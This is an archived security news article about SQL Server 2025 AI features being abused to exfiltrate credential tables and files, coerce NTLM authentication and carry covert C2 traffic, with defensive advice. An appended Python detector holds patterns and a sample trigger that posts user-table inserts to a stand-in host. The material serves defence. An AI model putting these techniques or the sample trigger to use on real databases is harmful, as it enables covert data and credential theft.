
SQL Server 2025 AI Features Can Be Abused to Exfiltrate Sensitive Data - cyberpress.org

cyberpress.org, archived Jun 18, 2026



By Lucas Martin, June 18, 2026. Categories: Cyber Security News

Microsoft SQL Server 2025’s newly introduced AI capabilities, designed to power Retrieval-Augmented Generation (RAG) pipelines, have been demonstrated to be a practical attack surface for data exfiltration and covert command-and-control (C2) communication. SQL Server 2025, released in November 2025, introduced AI-oriented features that researchers have now weaponized for offensive operations.

One of the most critical additions is sp_invoke_external_rest_endpoint, a new stored procedure that enables native HTTPS requests to arbitrary external endpoints with payloads up to 100 MB. Another major feature, CREATE EXTERNAL MODEL, allows attackers to define external AI embedding models, including attacker-controlled endpoints, directly within the database engine. This is complemented by AI_GENERATE_EMBEDDINGS, which sends string data to a defined model endpoint and returns a JSON vector array, functioning as a covert data transport channel.

[Figure: Data Exfiltration (Source: specterops)]

AI Features Can Be Abused to Exfiltrate Sensitive Data

The 100 MB payload ceiling on sp_invoke_external_rest_endpoint is particularly significant. Attackers can serialize entire database tables as JSON and POST them directly to an attacker-controlled HTTPS server, a far stealthier alternative to legacy exfiltration via xp_cmdshell or PowerShell’s Invoke-WebRequest.

The researcher demonstrated distinct data exfiltration methods. The first involves dumping credential tables using sp_invoke_external_rest_endpoint with a FOR JSON AUTO payload. The second extends this to filesystem access via OPENROWSET(BULK ...), enabling exfiltration of arbitrary files such as configuration documents or credential stores.
The third plants a database TRIGGER that automatically posts newly inserted credentials to an attacker server upon each table update, creating a persistent, low-noise collection mechanism that requires no repeated operator interaction.

Additionally, the CREATE EXTERNAL MODEL feature supports locally hosted ONNX models via UNC paths, which the researcher leveraged to coerce NTLM SMB authentication, thereby enabling hash-capture or relay attacks against domain infrastructure. Microsoft reviewed the report submitted April 20, 2026, but on May 12, 2026, determined the behavior did not meet the bar for security servicing, meaning the primitive remains exploitable.

Most notably, the researcher constructed a functional C2 implant entirely in T-SQL and a .NET CLR assembly that routes beacon traffic through AI_GENERATE_EMBEDDINGS. SpecterOps stated that commands are encrypted with XOR, encoded as synthetic vector arrays to mimic legitimate embedding model traffic, and decoded server-side. The implant connects back using context connection=true to reuse the in-process SQL session, avoiding the creation of new network connections from the agent process itself. The resulting traffic is visually indistinguishable from authentic AI model telemetry to an untrained analyst.

Security teams should immediately audit all SQL Server database logins and remove unnecessary sysadmin privileges from application service accounts, as over-privileged accounts remain the most common initial access vector. Alerting should be configured for CREATE EXTERNAL MODEL statements, sp_invoke_external_rest_endpoint enablement, and CLR assembly deployment using SQL Audit or Extended Events, since native SQL Server logs do not reliably capture these actions without custom instrumentation.
At the network layer, blocking internet-bound HTTPS egress from SQL Server hosts directly at the firewall or proxy level will stop most exfiltration attempts cold, particularly for organizations that host AI models internally. Finally, security operations teams must baseline legitimate embedding model traffic patterns and train analysts to detect anomalies, as AI-normalized egress fundamentally erodes the decades-old rule of treating outbound database web traffic as an automatic red flag.
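
The alerting recommended above, as an added Python example that is not from the article or from SpecterOps: it triages statement text captured by SQL Audit or Extended Events for the actions the article names, and checks model and REST destinations against an approved list. The approved-host list, rule names, hostnames and sample statements are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: endpoints your organisation has approved for model or REST calls.
APPROVED_HOSTS = {"embeddings.corp.example"}

# One rule per action the article says to alert on (names are this example's own).
RULES = {
    "external_model_created": r"\bCREATE\s+EXTERNAL\s+MODEL\b",
    "rest_endpoint_call": r"\bsp_invoke_external_rest_endpoint\b",
    # Assumption: enablement appears as an sp_configure call naming the option.
    "rest_endpoint_enabled": r"\bsp_configure\b.*external rest endpoint",
    "clr_assembly_deployed": r"\bCREATE\s+ASSEMBLY\b",
    "trigger_with_rest_call":
        r"\bCREATE\s+(?:OR\s+ALTER\s+)?TRIGGER\b.*sp_invoke_external_rest_endpoint",
}
RULES = {name: re.compile(rx, re.I | re.S) for name, rx in RULES.items()}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
UNC_RE = re.compile(r"'\\\\[^\\']+\\[^']*'")  # quoted literal like '\\host\share\x'


def triage(statement):
    """Return sorted finding names for one captured T-SQL statement."""
    found = {name for name, rx in RULES.items() if rx.search(statement)}
    if found & {"external_model_created", "rest_endpoint_call"}:
        for url in URL_RE.findall(statement):
            host = (urlparse(url).hostname or "").lower()
            if host not in APPROVED_HOSTS:
                found.add("unapproved_destination:" + host)
    if "external_model_created" in found and UNC_RE.search(statement):
        found.add("unc_model_path")  # SMB path: the NTLM coercion case
    return sorted(found)


# Constructed statement text, shaped like what SQL Audit or Extended Events record.
SAMPLES = [
    "SELECT TOP 10 * FROM dbo.Orders",
    "EXEC sp_configure 'external rest endpoint enabled', 1; RECONFIGURE",
    "CREATE EXTERNAL MODEL m1 WITH (LOCATION = 'https://embeddings.corp.example/v1')",
    "CREATE EXTERNAL MODEL m2 WITH (LOCATION = 'https://unknown-host.example/embed')",
    r"CREATE EXTERNAL MODEL m3 WITH (LOCATION = '\\fileserver.example\share\m.onnx')",
    "CREATE TRIGGER t ON dbo.Users AFTER INSERT AS "
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://unknown-host.example/in'",
    "CREATE ASSEMBLY Helper FROM 'C:\\lib\\helper.dll' WITH PERMISSION_SET = UNSAFE",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(triage(s), "<-", s[:60])
```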
Article Info
Source: cyberpress.org
Category: Insider Threat & DLP
Published: Jun 18, 2026
Archived: Jun 18, 2026